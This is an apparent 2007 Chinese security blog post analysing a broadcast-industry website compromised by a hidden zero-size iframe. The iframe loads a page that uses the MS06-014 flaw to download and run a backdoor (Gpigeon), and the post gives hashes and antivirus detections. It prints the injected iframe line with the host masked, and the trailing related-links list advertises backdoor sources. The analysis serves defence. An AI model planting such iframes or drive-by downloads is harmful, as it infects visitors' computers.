某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
endurer 原创
2007-09-06 第1版
网站页面被植入代码:
/---
<iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0>
---/
hxxp://www.h**l*bz.com/x*j***/Dns.htm 包含 JavaScript脚本,首先输出escape编码的信息:
/---
www.CuteQq.cn
ZJWm 6 Beta 3
---/
接着利用 MS06014 漏洞,下载 sx.exe,保存为 %system32%/Cuteqq_Cn.exe,再用 shell.execute来运行。
文件说明符 : d:/test/sx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-5 12:46:20
修改时间 : 2007-9-5 12:46:56
访问时间 : 2007-9-5 0:0:0
大小 : 284672 字节 278.0 KB
MD5 : 2262830c8f7f932cf08ed1a296b2acaa
HSA1: 6F8B603FB869F52960184E843A724677115C0A97
使用的是WMP媒体文件的图标
Kasepersky 报为 Packed.Win32.Klone.af
主 题: |
病毒上报邮件分析结果-流水单号:20070905125954073811 |
发件人: |
"" <send@rising.net.cn> |
发送时间2007.09.05 14:16 |
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:sx.exe
病毒名:
Backdoor.Win32.Gpigeon.aic 您所上报的病毒文件将在19.39.30版本中处理解决。
分享到:
相关推荐
Backdoor.Win32.Delf.aws 病毒样本。
【病毒名称】:Backdoor.Win32.Hupigon.dsx 【病毒类型】:后门 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 病毒运行后,首先修改该系统时间,致使一些杀软安软因系统时间不符...
重新启动,打开工具直接绿色运行,本工具是经过在xp系统上测试过的,没有问题,win7还没有测试
生产使用的Linux.BackDoor.Gates.5木马处理文档!
delphi Backdoor.Metarage
大马文件
我们因掌握删除计算机病毒的方法,以减少我们的损失,通过对威金病毒、恶邮差病毒、MSN圣诞照片变种B(Backdoor.Win32.PBot.b)的手工删除来学习掌握手工删除计算机病毒的方法。并了解病毒的本质、构成以及运行原理...
文件夹图标病毒专杀工具FolderCure更新到:V4.7Bulid20091001-1 Foldcure增加AI_Boy所破坏的文件夹与注册表的修复模块 更改FolderCure主界面一处文字说明 ...svrhost.exe Backdoor.Win32.Gpigeon.dks等等
ASP.NET源码——ASP.NET Web BackDoor.zip
ident_backdoor
account_backdoor
mod_rootme_backdoor
#History这是PHP脚本后门的列表,允许攻击者破坏网站并获得对数据库和敏感目录的完整访问权,基本上是PHP Backdoor Web应用程序Trojan,它可以完全入侵任何网站并获得完整的数据库。 #仅用于教育目的。
backdoor-pyc, 带代码的修补程序文件 相当 lame 后门沉淀物用恶意代码文件替换pmbus文件。更改日志#### 11/10/2015不再向tmp写入,直接编辑pyc文件Bug 修复以前的工作https://www.virusbtn.com/virusbulletin
仅用于教育和/或测试目的。 笔记 不一定包含您可以在反找到的后门的反混淆的版本。 要对这些技巧和其他技巧进行模糊处理,请查看“ 部分。 始终在安全的环境中调查恶意软件。 这意味着:与您的网络分开并在虚拟机...
lpkKiller是巨盾出品的...RavRbot是一款针对Backdoor.Win32.Rbot后门病毒的专用清除工具,而该病毒可以在有可执行文件的目录下生成LPK.DLL文件,当运行改文件的时间便会激活,导致不能彻底清除,而本工具便能很好的解决
无惧上传类UpFileClassV2.2.rar asp无惧上传类UpFileClassV2.2.rar
mysql backdoor. see it yourself
阅读工具,也同样被感染了一个名为Backdoor.XiaoNiao的木马,这个木马对现在的杀软来说,轻松搞定,也没什么影响。 如果对病毒和木马有所顾及,请勿使用该工具。再补充一点,此工具来源于学术不端行为检测工具的原...